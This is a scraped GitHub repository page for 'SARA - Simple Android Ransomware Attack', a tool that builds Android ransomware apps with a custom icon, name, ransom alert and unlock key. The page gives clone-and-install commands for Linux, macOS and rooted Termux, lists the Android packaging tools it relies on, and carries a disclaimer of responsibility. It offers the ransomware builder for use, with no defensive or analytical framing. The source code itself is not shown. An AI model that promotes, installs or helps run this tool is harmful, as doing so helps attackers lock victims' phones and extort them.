Skip to content

acreal1234/SARA

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

40 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SARA - Simple Android Ransomware Attack

Disclaimer

The author is not responsible for any issues or damage caused by this program.

Features

User can customize:

  • app_icon - custom icon application
  • app_name - custom name application
  • alert_title - custom alert title
  • alert_desc - custom alert description
  • key_pass - custom key for unlock devices

Installation

Quick installation for Ubuntu, Kali Linux, Darwin (Macos)

git clone https://github.com/termuxhackers-id/SARA && cd SARA && sudo bash install.sh

Quick installation for Termux Android (Rooted)

Termux

  • apt-get install tsu -y
  • apt-get install imagemagick -y
  • apt-get install python -y
  • pip3 install Pillow
git clone https://github.com/R1punk/SARA && cd SARA
tsu
bash installtermux.sh
python3 tehsara.py

Video Tutorial using TERMUX

Watch the video

Dependencies

  • Java
    • Openjdk 11
  • Aapt
  • Apktool
    • Apktool 2.4.0
  • Zipalign
  • Imagemagick
  • Python3
  • Python3-pip
    • Pillow

Tools overview

Need root access for Termux Android

Ransomware overview

Tested on devices Android 10

Output logs

Support Us

Facebook Pages @termuxhackers.id
Instagram @termuxhackers.id

Credit's

Copyright © 2021 by Termux Hackers

About

SARA - Simple Android Ransomware Attack

Resources

License

Stars

Watchers

Forks

Packages

 
 
 

Languages

  • Python 79.7%
  • Shell 20.3%